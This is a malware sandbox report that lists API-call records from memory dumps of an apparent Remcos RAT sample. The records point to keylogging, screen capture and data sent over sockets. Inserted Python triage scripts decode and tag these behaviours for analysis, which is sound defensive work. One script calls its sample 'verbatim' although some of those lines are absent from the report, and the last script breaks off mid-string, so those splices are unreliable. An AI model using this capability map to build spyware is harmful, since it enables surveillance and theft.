• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                          • String ID: [ $ ]
                                                                                                                                                                          • API String ID: 3309952895-93608704
                                                                                                                                                                          • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                                                                          • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                                                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 188215759-0
                                                                                                                                                                          • Opcode ID: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                                                                                                                                                          • Instruction ID: 34fec0fc5de9b46989c99fc374850f6e4511d06c61be9fc580282ef5e3b3a0c9
                                                                                                                                                                          • Opcode Fuzzy Hash: b0079fa80277cdab6546f5ab837447f57eff53afd9c3e38f4d74f1bcd6e8dbc3
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A1142B35043446BC304FBB5CD85DEF77ACEBC4359F040A3EF64A82061EE29EA498695
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                                                                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                                                                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                                                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleOpenProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 39102293-0
                                                                                                                                                                          • Opcode ID: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                                                                                                                                                          • Instruction ID: eb9e11a2b0883253d54455b1eb0df9c10e535dd1e95c930e162dea6fb874dde8
                                                                                                                                                                          • Opcode Fuzzy Hash: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F01F231680215ABD71066949C8AFA7B66C8B84756F0001ABFA08D2292EE74CD81466A
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                                                                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2633735394-0
                                                                                                                                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                                                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                                                                                                          • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                                                                                                          • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                                                                                                          • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4116985748-0
                                                                                                                                                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
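The API listings above give only call sites and raw hexadecimal arguments. The Python script below is an added triage example; it is not part of the Joe Sandbox report and not code from the Remcos sample. It parses listings in the format used on this page (the bullet lines, the "Part of subcall function" prefix and the "ref:" suffix), decodes the constants that appear here (GetSystemMetrics 0x4C to 0x4F are SM_XVIRTUALSCREEN, SM_YVIRTUALSCREEN, SM_CXVIRTUALSCREEN and SM_CYVIRTUALSCREEN; OpenProcess 0x1000 and 0x400 are PROCESS_QUERY_LIMITED_INFORMATION and PROCESS_QUERY_INFORMATION; the Sleep values are 500 ms and 100 ms) and tags each block with the behaviour an analyst would note. The embedded sample text is the three listings above copied verbatim; the behaviour labels and the choice of decoded constants are this example's own assumptions, not the report's.

```python
"""Parse Joe Sandbox-style per-function API listings and tag implied behaviour.

Added example; not Joe Sandbox or Remcos code. The constant tables cover the
values seen in this report and are an assumption about what to decode.
"""
import re

# Constructed sample: the three API listings from the report above, verbatim.
SAMPLE = """\
APIs
• Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
• Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
• Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
• Sleep.KERNEL32(000001F4), ref: 0040A5AE
• Sleep.KERNEL32(00000064), ref: 0040A638
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000), ref: 0041C2C4
• CloseHandle.KERNEL32(00000000), ref: 0041C2CC
• API ID: CloseHandleOpenProcess
APIs
• GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
• GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
• GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
• GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
• API ID: MetricsSystem
"""

CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
META_RE = re.compile(r"^•\s*(API ID|String ID):\s*(.*)$")

# GetSystemMetrics indices for the virtual-screen rectangle (winuser.h).
SM_INDEX = {0x4C: "SM_XVIRTUALSCREEN", 0x4D: "SM_YVIRTUALSCREEN",
            0x4E: "SM_CXVIRTUALSCREEN", 0x4F: "SM_CYVIRTUALSCREEN"}
# OpenProcess desired-access bits (winnt.h); decoded as a bitmask.
PROCESS_ACCESS = {0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}


def parse_args(raw):
    """'00001000,?,00000000' -> [0x1000, None, 0]; '?' is an argument the sandbox could not resolve."""
    if raw is None or raw.strip() == "":
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]


def parse_blocks(text):
    """Split the listing at each 'APIs' header into blocks of calls plus API/String IDs."""
    blocks = []
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            blocks.append({"calls": [], "api_id": "", "string_id": ""})
            continue
        if not blocks:
            continue
        m = CALL_RE.match(line)
        if m:
            blocks[-1]["calls"].append({"name": m["name"], "module": m["module"],
                                        "args": parse_args(m["args"]), "ref": m["ref"]})
            continue
        m = META_RE.match(line)
        if m:
            blocks[-1]["api_id" if m[1] == "API ID" else "string_id"] = m[2].strip()
    return blocks


def decode_call(call):
    """Render one call with its first argument decoded where the constant is known.
    Only the first argument is trusted: the extra values the sandbox lists for
    one-argument APIs such as GetSystemMetrics are stack residue."""
    name, args = call["name"], call["args"]
    first = args[0] if args else None
    if name == "GetSystemMetrics" and first in SM_INDEX:
        return f"{name}({SM_INDEX[first]})"
    if name == "OpenProcess" and first is not None:
        bits = [n for b, n in sorted(PROCESS_ACCESS.items()) if first & b]
        unknown = first & ~sum(PROCESS_ACCESS)
        if unknown:
            bits.append(hex(unknown))
        return f"{name}({'|'.join(bits) or hex(first)})"
    if name == "Sleep" and first is not None:
        return f"{name}({first} ms)"
    return name


def classify(block):
    """Map an API set to the behaviour an analyst would note for a RAT."""
    names = {c["name"] for c in block["calls"]}
    tags = []
    if {"GetForegroundWindow", "GetWindowTextW", "Sleep"} <= names:
        tags.append("foreground window title polling")  # window-context stamp for logged keys
    if "OpenProcess" in names:
        tags.append("opens handles to other processes")
    metrics = {c["args"][0] for c in block["calls"] if c["name"] == "GetSystemMetrics" and c["args"]}
    if metrics and metrics <= set(SM_INDEX):
        tags.append("virtual-screen bounds")  # the rectangle a screenshot routine needs
    return tags


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b["api_id"], "->", classify(b))
        for c in b["calls"]:
            print("   ", decode_call(c), "@", c["ref"])
```

Run it on text pasted from this section; the "String ID: [ $ ]" of the first block is the delimiter pair the title-polling routine wraps around the captured window title, which is why that block is tagged as the keylogger's window-context stamp.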
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                                                                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1761009282-0
                                                                                                                                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                                                          APIs
                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                          • String ID: pow
                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                                                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 1000655C
                                                                                                                                                                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021D4960,00000010), ref: 004048E0
                                                                                                                                                                            • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                                                          • String ID: hQG$h}v
                                                                                                                                                                          • API String ID: 1634807452-1113060276
                                                                                                                                                                          • Opcode ID: 924d4dea02d6d252b00b23d9c21eed4fbde36b019de5c56123dbc4f299c02f77
                                                                                                                                                                          • Instruction ID: bd8839fee7d7b479886ee9dd8bc27b498e65f27a04cbeda07bab16e05f906841
                                                                                                                                                                          • Opcode Fuzzy Hash: 924d4dea02d6d252b00b23d9c21eed4fbde36b019de5c56123dbc4f299c02f77
                                                                                                                                                                          • Instruction Fuzzy Hash: 9C5131315082419BC328FB22D851AEFB3E5AFD4348F50483FF54AA71E2EF78594AC659
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alloca_probe_16__freea
                                                                                                                                                                          • String ID: h}v
                                                                                                                                                                          • API String ID: 1635606685-2591199288
                                                                                                                                                                          • Opcode ID: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                                                                          • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                                                                                                                                          • Opcode Fuzzy Hash: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                                                                          • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                                                                                                                                          APIs
                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                                                                                                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                          • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                                                                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                          • String ID: image/jpeg
                                                                                                                                                                          • API String ID: 1291196975-3785015651
                                                                                                                                                                          • Opcode ID: 9b53b6ca85e1e970862b9060bab093b2d51b10dc603066e54454478e6ec1cfc5
                                                                                                                                                                          • Instruction ID: b1b0a2c635f45e8130f4767810c6fbb161559e0826da6e7acb487c9aae22ef17
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b53b6ca85e1e970862b9060bab093b2d51b10dc603066e54454478e6ec1cfc5
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D316F72504310AFC701EF65C884D6FB7E9EF8A304F00496EF98597251DB7999048B66
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                          • API String ID: 0-711371036
                                                                                                                                                                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                                                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
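                                                                                                                                                                          The records above are per-function API summaries lifted from two memory dumps of the same process: the image mapped at 0x400000 in the CasPol snapshot and a module mapped at 0x10000000. Reading capability out of dozens of such records by hand is slow, so the following Python is an added triage example (not part of the Joe Sandbox report, and not Joe Sandbox tooling) that parses the record layout used on this page and tags each dump source with the capability clusters its API combinations imply: GDI+ image re-encoded into a memory stream (screen capture; the record's string gives the MIME type image/jpeg), keyboard-layout lookup in the same function as socket connect/send (keylog data staged for C2), and the CRT invalid-parameter abort path (IsProcessorFeaturePresent(0x17) then TerminateProcess with 0xC0000417), which is library code to discount rather than a capability. The sample input is constructed from three of the records above, trimmed to the fields the parser reads; the rule names are my own.

```python
"""Triage helper for Joe Sandbox per-function records (added example, not part of the report)."""
import re
from collections import defaultdict

# Constructed sample: three of the records above, trimmed to the fields this script reads.
SAMPLE = """\
APIs
• _free.LIBCMT ref: 1000655C
  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• String ID: *?$.
• Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021D4960,00000010), ref: 004048E0
  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: hQG$h}v
• Instruction Fuzzy Hash: 9C5131315082419BC328FB22D851AEFB3E5AFD4348F50483FF54AA71E2EF78594AC659
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
• SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
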